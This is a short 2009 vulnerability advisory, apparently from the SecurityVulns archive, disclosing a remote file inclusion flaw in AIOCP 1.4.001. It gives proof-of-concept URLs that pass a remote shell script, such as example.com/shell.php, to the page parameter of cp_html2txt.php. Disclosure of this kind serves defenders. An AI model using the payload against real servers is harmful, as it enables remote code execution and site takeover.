Remote File Inclusion in aiocp

2009-07-27T00:00:00
ID SECURITYVULNS:DOC:22219
Type securityvulns
Reporter Securityvulns
Modified 2009-07-27T00:00:00

Description

Aiocp 1.4.001 Remote File Inclusion vulnerability

Found by : Hadi Kiamarsi

Contact : hadikiamarsi [at] hotmail.com

Download :

http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download

PoC :

http://[target]/[path]/public/code/cp_html2txt.php?page=[SHELL]

example :

http://localhost/root/public/code/cp_html2txt.php?page=http://www.example.com/shell.php

local Example :

http://localhost/root/public/code/cp_html2txt.php?page=http://localhost/shell.php